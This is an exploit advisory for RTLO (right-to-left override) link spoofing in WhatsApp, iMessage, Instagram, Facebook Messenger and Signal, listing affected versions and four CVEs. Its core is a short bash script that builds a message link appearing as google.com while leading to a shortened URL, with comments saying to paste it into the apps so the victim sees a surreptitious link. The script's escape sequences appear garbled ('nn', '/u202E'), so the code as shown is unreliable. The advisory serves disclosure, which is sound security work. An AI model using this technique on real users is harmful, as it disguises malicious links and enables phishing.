Exploit/Advisories

# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096

#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+

# References: https://github.com/zadewg/RIUS
# https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
# https://sick.codes/sick-2022-40

APPEAR_AS='https://google.com'

DESTINATION='bit.ly/3ixIRwm'

printf "nn${APPEAR_AS}/u202E${DESTINATION}nn"

# copy paste into any of the above apps.
# victim will see a surreptitious link

# works on latest Signal (unpatched)

Comments are closed.